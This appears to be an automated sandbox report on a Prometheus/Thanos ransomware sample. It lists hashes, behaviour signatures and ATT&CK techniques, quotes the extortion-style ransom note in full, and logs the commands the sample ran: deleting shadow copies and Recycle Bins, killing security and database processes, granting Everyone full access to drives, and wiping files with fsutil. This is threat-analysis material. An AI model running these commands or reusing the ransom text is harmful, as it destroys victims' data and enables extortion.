Overview

overview

10

Static

static

HEUR-Troja...3b.exe

windows7-x64

10

HEUR-Troja...3b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    65s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2022 09:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe

  • Size

    123KB

  • MD5

    14de196b28bc12b5e571ea8303668041

  • SHA1

    7f400d518bd716e75c795de47e1dc67f9d29d582

  • SHA256

    9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b

  • SHA512

    1fe6f312057ca6debe2552f02c231cacff60f79fc40c053c26500f58fe4575fd4c820883bb4203ead2e9db00402883389d72853f304d3e198a333ef49e387b6f

  • SSDEEP

    3072:RdvedgwAwp9orNJUq11rfAEVMjOPsn94+fmVnj/:b4gnxMjO+9tfmVj

Score
10/10
prometheusdiscoveryevasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: H8FoZ3sB/VLBNTvBRREIQF75ZmeQYrfLsMoNkNm8ZmeO0vazg0JfUqACr13eLbaTk/WGU2mqLLEm1jwT4lb1Arrht2pUNTPlOGiG2fLuPuwI5yr7OElWtfp4nWFEG2vxX06sW7gpSQ+QaM6CU/6FFxqKxIRc9MO5EIIbtbh/Dw2KfSA+5obgwyL7RmH52GtucPNC440q3T1+Kt1/nQcoXOLrnf7vAMUnlZerJg7y/8FsHOXyx7f5YpfMNFeSvtHrwv5j53vffw7OQhClcoHJu4PhDQFc9+wuPZ3Aph5PMuDj8G4qJjFs1yeQ1bQxxu0Ckmd5yfbSCTGmDRn6vpzN1JCIaNRW8jz1Pc+ds6uBAQ2iJU9uCpHvzvkJDUuJYZX+dC/M1hRbhR0fSyZWo+q2sMSoa3oQz2/BXGj/+5zb0Gh1YS4H3UtkhDpMHtjZ/AMtMUjIuZmmadZHF4Jz5jccBiRNJhxAuLC+91fC5CYI0CIeKMzGH31MWlAYAdoKp3uXGvY2rCMkTkXMcHN4nFb7JGpow9ULMsA4Q8/SOCVO1Jt+10KkQR+Bwn1T/9pMw9iIz+Ulme+oM2I/87iSf4nezB4/5SNVZ2scQMxnaW/+HdqqlKx0W8fOYwqGSJxuHB80C4PxjRWRMg+zl6ibr+d75NSAz7Ofmfw8Lp7pwlKnOSc=
URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: H8FoZ3sB/VLBNTvBRREIQF75ZmeQYrfLsMoNkNm8ZmeO0vazg0JfUqACr13eLbaTk/WGU2mqLLEm1jwT4lb1Arrht2pUNTPlOGiG2fLuPuwI5yr7OElWtfp4nWFEG2vxX06sW7gpSQ+QaM6CU/6FFxqKxIRc9MO5EIIbtbh/Dw2KfSA+5obgwyL7RmH52GtucPNC440q3T1+Kt1/nQcoXOLrnf7vAMUnlZerJg7y/8FsHOXyx7f5YpfMNFeSvtHrwv5j53vffw7OQhClcoHJu4PhDQFc9+wuPZ3Aph5PMuDj8G4qJjFs1yeQ1bQxxu0Ckmd5yfbSCTGmDRn6vpzN1JCIaNRW8jz1Pc+ds6uBAQ2iJU9uCpHvzvkJDUuJYZX+dC/M1hRbhR0fSyZWo+q2sMSoa3oQz2/BXGj/+5zb0Gh1YS4H3UtkhDpMHtjZ/AMtMUjIuZmmadZHF4Jz5jccBiRNJhxAuLC+91fC5CYI0CIeKMzGH31MWlAYAdoKp3uXGvY2rCMkTkXMcHN4nFb7JGpow9ULMsA4Q8/SOCVO1Jt+10KkQR+Bwn1T/9pMw9iIz+Ulme+oM2I/87iSf4nezB4/5SNVZ2scQMxnaW/+HdqqlKx0W8fOYwqGSJxuHB80C4PxjRWRMg+zl6ibr+d75NSAz7Ofmfw8Lp7pwlKnOSc=
URLs

http://promethw27cbrcot.onion/ticket.php?track=54Z-YAD-AWLD

Signatures

  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

    ransomwareprometheus
  • Modifies Windows Firewall 1 TTPs 2 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
    discovery
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2412
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4484
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:3424
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1552
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3984
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2616
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config Dnscache start= auto
            2⤵
            • Launches sc.exe
            PID:228
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
            • Launches sc.exe
            PID:4292
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
            • Launches sc.exe
            PID:2000
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c rd /s /q D:\\$Recycle.bin
            2⤵
              PID:4404
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SSDPSRV start= auto
              2⤵
              • Launches sc.exe
              PID:1888
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
              2⤵
              • Launches sc.exe
              PID:2336
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
              • Launches sc.exe
              PID:1264
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              PID:2460
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config upnphost start= auto
              2⤵
              • Launches sc.exe
              PID:1600
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SQLWriter start= disabled
              2⤵
              • Launches sc.exe
              PID:1668
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1416
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM synctime.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1168
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2320
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:856
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM Ntrtscan.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1472
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mysqld.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2340
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM isqlplussvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1988
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3804
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqbcoreservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM firefoxconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2984
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM encsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3132
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM onenote.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4992
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM agntsvc.exe /F
              2⤵
              • Kills process with taskkill
              PID:3504
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM excel.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4312
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM PccNTMon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4800
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM thebat.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1124
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlwriter.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4300
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM msaccess.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1244
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM CNTAoSMgr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4648
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM steam.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4880
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM tbirdconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:956
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM ocomm.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3756
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM outlook.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3484
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM dbeng50.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4164
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM tmlisten.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3900
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" IM thunderbird.exe /F
              2⤵
              • Kills process with taskkill
              PID:4180
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM infopath.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2936
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM dbsnmp.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4336
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM thebat64.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4124
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM msftesql.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2976
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mbamtray.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1892
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM xfssvccon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2160
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM powerpnt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3860
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM wordpad.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3204
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM zoolz.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1156
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mysqld-opt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3944
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4952
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM ocautoupds.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3012
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM visio.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3524
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM ocssd.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4296
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4064
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM winword.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4992
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3504
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM oracle.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:856
            • C:\Windows\SysWOW64\netsh.exe
              "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              PID:740
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM mysqld-nt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3980
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlagent.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5088
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlbrowser.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2240
            • C:\Windows\SysWOW64\taskkill.exe
              "taskkill.exe" /IM sqlservr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4740
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4852
            • C:\Windows\SysWOW64\icacls.exe
              "icacls" "C:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:3872
            • C:\Windows\SysWOW64\icacls.exe
              "icacls" "Z:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:1504
            • C:\Windows\SysWOW64\icacls.exe
              "icacls" "D:*" /grant Everyone:F /T /C /Q
              2⤵
              • Modifies file permissions
              PID:3280
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
              2⤵
                PID:2344
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:4152
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:456
                  • C:\Windows\SysWOW64\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:1168
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
                    2⤵
                      PID:2320
                      • C:\Windows\SysWOW64\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:1552

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Initial Access

                    Execution

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Winlogon Helper DLL

                    1
                    T1004

                    Privilege Escalation

                    Defense Evasion

                    File Permissions Modification

                    1
                    T1222

                    Modify Registry

                    3
                    T1112

                    Credential Access

                    Discovery

                    Query Registry

                    1
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Remote System Discovery

                    1
                    T1018

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
                      Filesize

                      2KB

                      MD5

                      c17a4c4fcc49cfc7f3ba898aa6e88f12

                      SHA1

                      2a875bf8cc36fd465f0677fe5064ee54ca4cceba

                      SHA256

                      217a13b3d0da16d6ac7b542b5ad42042175b73980f22a3e938cd7ca68f766593

                      SHA512

                      90dda3d8ae23af0a288bd31739826e3751b0f707574ed6a4f165fc604df1a48e16f06b8390137a75fc8a35b411a4eb1be4debcc6acf1fd07bec663a56fcb966e

                      Download Submit
                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                      Filesize

                      21KB

                      MD5

                      aba0c73dabfce266ef8dec5d6278ba31

                      SHA1

                      112f64243d7980e4101f6a5628f738c190c822b0

                      SHA256

                      fe3df0c197fcaa45fb87d9c59cb570a3f9f134a77e0001d259e3eb05ceace396

                      SHA512

                      70f5c4aeb7275bc6dfb1290d8520413f004bf88684e1c40400ddcab85e8294ab1bb61e2d9a757f7e572ed9bd11cfec3fb04f2f6eb82b6bb121232b318019353a

                      Download Submit
                    • memory/228-140-0x0000000000000000-mapping.dmp
                      Download
                    • memory/740-193-0x0000000000000000-mapping.dmp
                      Download
                    • memory/856-192-0x0000000000000000-mapping.dmp
                      Download
                    • memory/856-153-0x0000000000000000-mapping.dmp
                      Download
                    • memory/956-170-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1124-165-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1156-184-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1168-151-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1244-167-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1264-146-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1416-152-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1472-154-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1552-137-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1600-148-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1668-149-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1888-144-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1892-180-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1988-156-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2000-142-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2160-181-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2240-196-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2320-150-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2336-145-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2340-155-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2412-133-0x0000000004DE0000-0x0000000004E46000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/2412-134-0x0000000005800000-0x0000000005DA4000-memory.dmp
                      Filesize

                      5.6MB

                      Download
                    • memory/2412-132-0x0000000000470000-0x0000000000496000-memory.dmp
                      Filesize

                      152KB

                      Download
                    • memory/2412-204-0x0000000006540000-0x00000000065D2000-memory.dmp
                      Filesize

                      584KB

                      Download
                    • memory/2460-147-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2616-139-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2936-174-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2976-179-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2984-159-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3012-187-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3132-161-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3204-183-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3424-136-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3484-172-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3504-162-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3524-188-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3756-171-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3804-157-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3860-182-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3900-176-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3944-185-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3980-194-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3984-138-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4060-158-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4064-190-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4124-178-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4164-173-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4180-175-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4292-141-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4296-189-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4300-166-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4312-163-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4336-177-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4404-143-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4484-135-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4648-168-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4740-197-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4800-164-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4852-202-0x0000000004C90000-0x0000000004CB2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/4852-198-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4852-199-0x00000000044E0000-0x0000000004516000-memory.dmp
                      Filesize

                      216KB

                      Download
                    • memory/4852-201-0x0000000004CD0000-0x00000000052F8000-memory.dmp
                      Filesize

                      6.2MB

                      Download
                    • memory/4852-203-0x0000000005370000-0x00000000053D6000-memory.dmp
                      Filesize

                      408KB

                      Download
                    • memory/4852-205-0x0000000005AC0000-0x0000000005ADE000-memory.dmp
                      Filesize

                      120KB

                      Download
                    • memory/4880-169-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4952-186-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4992-160-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4992-191-0x0000000000000000-mapping.dmp
                      Download
                    • memory/5088-195-0x0000000000000000-mapping.dmp
                      Download